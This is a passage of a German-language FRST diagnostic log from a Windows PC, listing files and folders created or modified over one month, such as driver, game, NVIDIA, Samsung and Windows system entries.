2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Druckumgebung
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Documents\Eigene Videos
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Documents\Eigene Musik
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Documents\Eigene Bilder
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\AppData\Local\Verlauf
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\AppData\Local\Anwendungsdaten
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Anwendungsdaten
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Vorlagen
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Startmenü
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Netzwerkumgebung
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Lokale Einstellungen
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Eigene Dateien
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Druckumgebung
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Videos
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Musik
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Bilder
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Verlauf
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Anwendungsdaten
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\DefaultAppPool\Anwendungsdaten
2016-04-14 02:24 - 2016-04-15 01:27 - 00000000 ____D C:\ProgramData\NVIDIA
2016-04-14 02:24 - 2016-04-14 23:53 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-04-14 02:24 - 2016-04-14 23:53 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-04-14 02:24 - 2016-04-14 02:26 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-04-14 02:24 - 2016-04-14 02:24 - 00018960 _____ (Logitech, Inc.) C:\WINDOWS\system32\Drivers\LNonPnP.sys
2016-04-14 02:24 - 2016-04-14 02:24 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-04-14 02:24 - 2016-04-14 02:24 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2016-04-14 02:24 - 2016-04-14 02:24 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2016-04-14 02:24 - 2016-04-14 02:24 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2016-04-14 02:24 - 2016-04-14 02:24 - 00000000 ____D C:\WINDOWS\system32\DAX2
2016-04-14 02:24 - 2016-04-14 02:24 - 00000000 ____D C:\Program Files\Realtek
2016-04-14 02:24 - 2016-03-22 04:37 - 06369728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2016-04-14 02:24 - 2016-03-22 04:37 - 02994744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2016-04-14 02:24 - 2016-03-22 04:37 - 02561472 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2016-04-14 02:24 - 2016-03-22 04:37 - 01265720 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvvsvc.exe
2016-04-14 02:24 - 2016-03-22 04:37 - 00530880 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2016-04-14 02:24 - 2016-03-22 04:37 - 00393784 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2016-04-14 02:24 - 2016-03-22 04:37 - 00083512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2016-04-14 02:24 - 2016-03-22 04:37 - 00069568 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2016-04-14 02:24 - 2016-03-18 13:44 - 06253721 _____ C:\WINDOWS\system32\nvcoproc.bin
2016-04-13 21:34 - 2016-04-13 21:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2016-04-12 17:09 - 2016-04-14 00:09 - 00000000 ____D C:\ProgramData\BlueStacksSetup
2016-04-12 02:13 - 2016-04-15 00:01 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Samsung
2016-04-12 02:13 - 2016-04-12 02:13 - 00000000 ____D C:\Users\Public\Documents\NativeFus_Log
2016-04-12 02:13 - 2016-04-12 02:13 - 00000000 ____D C:\Users\Marcel\Documents\samsung
2016-04-12 02:13 - 2016-04-12 02:13 - 00000000 ____D C:\Users\Marcel\AppData\Local\Samsung
2016-04-12 02:08 - 2016-04-15 00:01 - 00000000 ____D C:\ProgramData\Samsung
2016-04-12 02:08 - 2016-04-15 00:01 - 00000000 ____D C:\Program Files (x86)\Samsung
2016-04-12 02:08 - 2013-12-30 10:53 - 04659712 _____ (Dmitry Streblechenko) C:\WINDOWS\SysWOW64\Redemption.dll
2016-04-12 02:08 - 2013-12-30 10:53 - 00144664 _____ (MAPILab Ltd. & Add-in Express Ltd.) C:\WINDOWS\SysWOW64\secman.dll
2016-04-12 02:07 - 2016-04-12 02:07 - 00000000 ____D C:\Users\Marcel\AppData\Local\Downloaded Installations
2016-04-12 01:06 - 2016-04-12 01:06 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-04-11 11:07 - 2016-04-11 12:34 - 00000000 ____D C:\Users\Marcel\Documents\Heroes of the Storm
2016-04-07 11:56 - 2016-04-07 11:56 - 00629078 _____ C:\Users\Marcel\Downloads\girlsactbuchkomplett.pdf
2016-04-05 01:12 - 2016-04-14 02:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID
2016-04-05 01:12 - 2016-04-05 01:12 - 00000000 ____D C:\Program Files\CPUID
2016-04-04 00:19 - 2016-04-14 02:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cisco
2016-04-04 00:19 - 2016-04-04 00:19 - 00000000 ____D C:\Users\Marcel\AppData\Local\Cisco
2016-04-04 00:19 - 2016-04-04 00:19 - 00000000 ____D C:\Program Files (x86)\Cisco
2016-04-04 00:19 - 2015-07-22 17:36 - 00129520 ____R (Cisco Systems, Inc.) C:\WINDOWS\system32\Drivers\acsock64.sys
2016-04-04 00:18 - 2016-04-04 00:19 - 00000000 ____D C:\ProgramData\Cisco
2016-03-29 13:56 - 2016-03-29 13:56 - 00001040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 11.lnk
2016-03-29 13:56 - 2016-03-29 13:56 - 00001028 _____ C:\Users\Public\Desktop\TeamViewer 11.lnk
2016-03-29 01:42 - 2016-04-13 20:28 - 00163840 ___SH C:\Users\Marcel\Desktop\Thumbs.db
2016-03-24 14:54 - 2016-03-24 15:47 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\ImgBurn
2016-03-24 14:42 - 2016-04-14 02:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ImgBurn
2016-03-24 14:42 - 2016-03-24 14:42 - 00001946 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ImgBurn.lnk
2016-03-24 14:42 - 2016-03-24 14:42 - 00000000 ____D C:\Program Files (x86)\ImgBurn
2016-03-22 22:58 - 2016-03-22 22:58 - 00000000 ____D C:\Program Files (x86)\Microsoft XNA
2016-03-22 22:58 - 2007-04-04 19:53 - 00081768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xinput1_3.dll
2016-03-22 22:57 - 2016-04-14 22:23 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\StardewValley
2016-03-16 23:30 - 2016-03-16 23:30 - 00128792 _____ C:\WINDOWS\SysWOW64\vulkan-1-1-0-5-1.dll
2016-03-16 23:29 - 2016-03-16 23:29 - 00127768 _____ C:\WINDOWS\system32\vulkan-1-1-0-5-1.dll
2016-03-16 23:29 - 2016-03-16 23:29 - 00041752 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-1-0-5-1.exe
2016-03-16 23:28 - 2016-03-16 23:28 - 00045848 _____ C:\WINDOWS\system32\vulkaninfo-1-1-0-5-1.exe
2016-03-16 01:06 - 2016-03-16 01:06 - 00000000 ____D C:\Users\Marcel\AppData\LocalLow\Temp

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-15 16:46 - 2015-12-06 19:27 - 00000000 ____D C:\FRST
2016-04-15 16:38 - 2015-10-12 16:23 - 00001138 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-15 16:38 - 2015-08-21 00:04 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Skype
2016-04-15 15:50 - 2015-08-23 23:58 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-15 12:08 - 2015-09-18 16:03 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\vlc
2016-04-15 11:12 - 2015-08-21 01:14 - 00000000 ____D C:\Program Files (x86)\Steam
2016-04-15 11:09 - 2015-08-21 18:46 - 00004160 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{AF529835-495D-4D2B-AB6E-9C2ECA94DC8A}
2016-04-15 11:07 - 2012-07-14 16:28 - 00000000 ____D C:\mIRC
2016-04-15 11:06 - 2015-10-12 16:23 - 00001134 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-15 01:33 - 2016-02-13 18:59 - 00889046 _____ C:\WINDOWS\system32\perfh007.dat
2016-04-15 01:33 - 2016-02-13 18:59 - 00197628 _____ C:\WINDOWS\system32\perfc007.dat
2016-04-15 01:33 - 2015-10-30 09:21 - 00000000 ____D C:\WINDOWS\INF
2016-04-15 01:30 - 2015-12-01 02:39 - 00000000 ____D C:\ProgramData\AVAST Software
2016-04-15 01:27 - 2016-02-13 19:26 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-15 01:27 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\ELAMBKUP
2016-04-15 01:27 - 2015-10-30 08:28 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-04-15 00:27 - 2015-12-06 19:36 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-04-15 00:26 - 2016-02-06 03:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-04-15 00:26 - 2016-02-06 03:57 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-04-15 00:01 - 2015-08-20 01:39 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-04-15 00:00 - 2015-10-30 09:24 - 00000000 __RHD C:\Users\Public\Libraries
2016-04-14 23:54 - 2016-03-13 17:10 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2016-04-14 23:54 - 2015-08-21 01:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-04-14 20:33 - 2015-10-30 08:28 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2016-04-14 19:07 - 2015-10-30 09:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-04-14 18:57 - 2016-02-13 10:22 - 00344920 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-04-14 18:57 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\Registration
2016-04-14 18:56 - 2015-12-06 18:40 - 00000000 ____D C:\AdwCleaner
2016-04-14 12:41 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\rescache
2016-04-14 12:10 - 2015-10-30 09:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-14 12:10 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-14 12:09 - 2015-08-21 01:02 - 00000000 ____D C:\Users\Marcel\AppData\Local\Packages
2016-04-14 11:46 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\appcompat
2016-04-14 03:23 - 2015-10-30 09:24 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2016-04-14 03:21 - 2016-02-13 19:13 - 00000000 ____D C:\Program Files\Windows Journal
2016-04-14 03:21 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-04-14 03:21 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-04-14 03:21 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-04-14 03:21 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-04-14 03:21 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-04-14 03:21 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-04-14 03:21 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-04-14 03:21 - 2015-10-30 08:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-04-14 03:21 - 2015-10-30 08:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-04-14 03:17 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2016-04-14 03:17 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2016-04-14 03:17 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\MUI
2016-04-14 03:17 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2016-04-14 03:17 - 2015-10-30 09:19 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqutil.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqrt.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.tlb
2016-04-14 03:17 - 2015-10-30 09:19 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa30.tlb
2016-04-14 03:17 - 2015-10-30 09:19 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa20.tlb
2016-04-14 03:17 - 2015-10-30 09:19 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa10.tlb
2016-04-14 03:17 - 2015-10-30 09:19 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2016-04-14 03:17 - 2015-10-30 09:19 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2016-04-14 03:17 - 2015-10-30 09:19 - 00009096 _____ C:\WINDOWS\SysWOW64\msmqtrc.mof
2016-04-14 03:17 - 2015-10-30 09:18 - 01417728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00813056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00317440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqrt.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys
2016-04-14 03:17 - 2015-10-30 09:18 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb
2016-04-14 03:17 - 2015-10-30 09:18 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb
2016-04-14 03:17 - 2015-10-30 09:18 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb
2016-04-14 03:17 - 2015-10-30 09:18 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe
2016-04-14 03:17 - 2015-10-30 09:18 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb
2016-04-14 03:17 - 2015-10-30 09:18 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe
2016-04-14 03:17 - 2015-10-30 09:18 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2016-04-14 03:17 - 2015-10-30 09:18 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2016-04-14 03:17 - 2015-10-30 09:18 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof
2016-04-14 03:17 - 2015-10-30 09:17 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00220160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2016-04-14 03:17 - 2015-10-30 09:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2016-04-14 03:17 - 2015-10-30 09:17 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2016-04-14 03:17 - 2015-10-30 09:17 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00004608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2016-04-14 03:17 - 2015-10-30 09:17 - 00004608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2016-04-14 02:33 - 2015-08-21 01:04 - 00002425 _____ C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-04-14 02:33 - 2015-08-21 01:04 - 00000000 ___RD C:\Users\Marcel\OneDrive
2016-04-14 02:30 - 2016-02-13 19:32 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-04-14 02:30 - 2016-02-06 03:39 - 00000306 __RSH C:\ProgramData\ntuser.pol
2016-04-14 02:30 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Windows NT
2016-04-14 02:30 - 2015-08-21 00:19 - 00067831 _____ C:\WINDOWS\diagwrn.xml
2016-04-14 02:30 - 2015-08-21 00:19 - 00040901 _____ C:\WINDOWS\diagerr.xml
2016-04-14 02:29 - 2015-10-30 09:24 - 00000000 __RSD C:\WINDOWS\Media
2016-04-14 02:29 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2016-04-14 02:29 - 2015-10-12 16:23 - 00003650 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-04-14 02:29 - 2015-10-12 16:23 - 00003426 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-04-14 02:29 - 2015-09-28 21:05 - 00002954 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2016-04-14 02:29 - 2015-08-23 23:58 - 00003098 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-04-14 02:29 - 2015-08-21 00:55 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2016-04-14 02:29 - 2015-08-20 20:49 - 00003046 _____ C:\WINDOWS\System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473
2016-04-14 02:29 - 2015-08-20 20:49 - 00002680 _____ C:\WINDOWS\System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon
2016-04-14 02:28 - 2016-01-11 14:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
2016-04-14 02:28 - 2016-01-11 13:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Black & White 2
2016-04-14 02:28 - 2015-11-03 21:50 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Open Broadcaster Software
2016-04-14 02:28 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\ModemLogs
2016-04-14 02:28 - 2015-10-30 09:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-04-14 02:28 - 2015-09-18 16:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2016-04-14 02:28 - 2015-08-21 21:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2016-04-14 02:28 - 2015-08-21 18:50 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2016-04-14 02:28 - 2015-08-21 18:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-04-14 02:28 - 2015-08-21 18:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mIRC
2016-04-14 02:28 - 2015-08-21 18:33 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-04-14 02:28 - 2015-08-21 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-04-14 02:28 - 2015-08-21 18:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2016-04-14 02:28 - 2015-08-21 01:17 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-04-14 02:28 - 2015-08-21 01:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2016-04-14 02:28 - 2015-08-21 00:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-04-14 02:28 - 2015-08-20 20:49 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel
2016-04-14 02:28 - 2015-07-10 11:05 - 00000000 ____D C:\Users\Default.migrated
2016-04-14 02:26 - 2016-03-13 17:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.0
2016-04-14 02:26 - 2016-02-13 19:03 - 00000000 ____D C:\WINDOWS\OCR
2016-04-14 02:26 - 2016-02-13 18:58 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2016-04-14 02:26 - 2016-02-13 18:58 - 00000000 ____D C:\WINDOWS\DigitalLocker
2016-04-14 02:26 - 2015-12-10 10:38 - 00000000 ____D C:\WINDOWS\SysWOW64\xlive
2016-04-14 02:26 - 2015-12-08 16:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 __SHD C:\Program Files\Windows Sidebar
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\migwiz
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\IME
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\schemas
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-04-14 02:26 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-04-14 02:26 - 2015-08-21 08:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2016-04-14 02:26 - 2015-08-21 01:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer
2016-04-14 02:26 - 2015-08-20 21:14 - 00000000 ____D C:\WINDOWS\system32\SPReview
2016-04-14 02:26 - 2015-08-20 21:14 - 00000000 ____D C:\WINDOWS\system32\EventProviders
2016-04-14 02:26 - 2015-08-20 20:53 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-04-14 02:25 - 2016-03-10 19:14 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2016-04-14 02:25 - 2009-07-14 05:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-14 02:24 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\Help
2016-04-14 02:24 - 2015-10-30 08:28 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-04-14 02:14 - 2015-08-21 02:31 - 00008192 __RSH C:\BOOTSECT.BAK
2016-04-14 02:12 - 2016-02-13 20:36 - 00000000 ___HD C:\$WINDOWS.~BT
